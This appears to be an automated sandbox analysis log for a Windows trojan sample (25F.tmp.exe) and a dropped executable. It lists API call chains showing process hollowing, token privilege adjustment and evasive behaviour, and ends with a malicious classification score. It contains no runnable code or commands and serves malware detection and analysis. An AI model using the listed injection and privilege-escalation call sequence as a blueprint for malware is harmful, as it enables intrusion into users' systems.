            Source: C:\Users\user\Desktop\25F.tmp.exe | Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 0_2_00609014 LoadLibraryA,LoadLibraryA,CreateProcessA,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, | 0_2_00609014
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 2_2_00401170 ShowCaret,ShowCaret,ShowCaret,NtUnmapViewOfSection,ShowCaret,VirtualAllocEx,ShowCaret,WriteProcessMemory,ShowCaret,ShowCaret,ShowCaret,WriteProcessMemory,ShowCaret,ShowCaret,WriteProcessMemory,ShowCaret,ShowCaret,Wow64SetThreadContext,ShowCaret,ResumeThread, | 2_2_00401170
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00365C50 NtQueryInformationProcess, | 4_2_00365C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00364D00 GetVersionExA,strncpy,NtQueryInformationProcess, | 4_2_00364D00
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00365820 memset,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,InterlockedCompareExchange,WideCharToMultiByte,Sleep,CloseHandle, | 4_2_00365820
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00363440 printf,printf,printf,NtAllocateVirtualMemory, | 4_2_00363440
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_003656E0 NtQuerySystemInformation,NtQuerySystemInformation, | 4_2_003656E0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_003653D0 NtQueryInformationThread,OpenProcess,NtQueryInformationProcess,InterlockedCompareExchange,VirtualAllocEx,WriteProcessMemory,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle, | 4_2_003653D0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_004056E0 NtQuerySystemInformation,NtQuerySystemInformation, | 4_2_004056E0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00404D00 GetVersionExA,strncpy,NtQueryInformationProcess, | 4_2_00404D00
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00403440 printf,printf,printf,NtAllocateVirtualMemory, | 4_2_00403440
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00405C50 NtQueryInformationProcess, | 4_2_00405C50
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00405820 memset,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,InterlockedCompareExchange,WideCharToMultiByte,Sleep,CloseHandle, | 4_2_00405820
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_004053D0 NtQueryInformationThread,OpenProcess,NtQueryInformationProcess,InterlockedCompareExchange,VirtualAllocEx,WriteProcessMemory,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle, | 4_2_004053D0
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00369E7B: WriteFile,DeviceIoControl, | 4_2_00369E7B
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00362D60 | 4_2_00362D60
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00402D60 | 4_2_00402D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 9_2_003D2D60 | 9_2_003D2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 10_2_00182D60 | 10_2_00182D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 11_2_00382D60 | 11_2_00382D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 12_2_00412D60 | 12_2_00412D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 13_2_001B2D60 | 13_2_001B2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 14_2_00352D60 | 14_2_00352D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 15_2_00312D60 | 15_2_00312D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 16_2_00382D60 | 16_2_00382D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 17_2_00102D60 | 17_2_00102D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 18_2_00102D60 | 18_2_00102D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 19_2_00222D60 | 19_2_00222D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 20_2_00322D60 | 20_2_00322D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 21_2_00512D60 | 21_2_00512D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 22_2_00192D60 | 22_2_00192D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 23_2_00842D60 | 23_2_00842D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 25_2_00402D60 | 25_2_00402D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 26_2_00822D60 | 26_2_00822D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 27_2_00092D60 | 27_2_00092D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 29_2_005D2D60 | 29_2_005D2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 30_2_00092D60 | 30_2_00092D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 31_2_00912D60 | 31_2_00912D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 32_2_00392D60 | 32_2_00392D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 33_2_00092D60 | 33_2_00092D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 34_2_00222D60 | 34_2_00222D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_00152D6035_2_00152D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F2D6036_2_007F2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_00252D6037_2_00252D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_00262D6038_2_00262D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F2D6039_2_003F2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F2D6040_2_003F2D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_00282D6041_2_00282D60
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_00102D6042_2_00102D60
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: String function: 0040BA00 appears 37 times
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: String function: 00608CB8 appears 34 times
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: String function: 00603DEC appears 34 times
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: String function: 0036BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0032BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0040BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0022A310 appears 46 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0009BA00 appears 111 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0041BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0015BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 007FBA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0031BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 003FB990 appears 48 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0038B990 appears 48 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0025BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0026BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0010B990 appears 72 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0035BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0091BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 001BBA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0022BA00 appears 74 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0009A310 appears 69 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0051BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0038BA00 appears 74 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0038A310 appears 46 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 005DBA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0039BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0022B990 appears 48 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 003FA310 appears 46 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0010BA00 appears 111 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 003FBA00 appears 74 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0010A310 appears 69 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0082BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0028BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 003DBA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0084BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0019BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0018BA00 appears 37 times
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: String function: 0009B990 appears 72 times
Source: 25F.tmp.exe | Binary or memory string: OriginalFilenameChangeici4 vs 25F.tmp.exe
Source: 25F.tmp.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal100.troj.evad.winEXE@13/38@6/2
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00364C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0036A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_00404C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: 4_2_0040A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 9_2_003D4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 9_2_003DA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 10_2_00184C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 10_2_0018A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 11_2_00384C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 11_2_0038A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 12_2_00414C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 12_2_0041A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 13_2_001B4C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 13_2_001BA550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 14_2_00354C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 14_2_0035A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 15_2_00314C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 15_2_0031A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 16_2_00384C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 16_2_0038A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 17_2_00104C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 17_2_0010A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 18_2_00104C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 18_2_0010A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 19_2_00224C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 19_2_0022A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 20_2_00324C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 20_2_0032A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 21_2_00514C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 21_2_0051A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 22_2_00194C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 22_2_0019A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 23_2_00844C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 23_2_0084A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 25_2_00404C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 25_2_0040A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 26_2_00824C20 OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: 26_2_0082A550 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
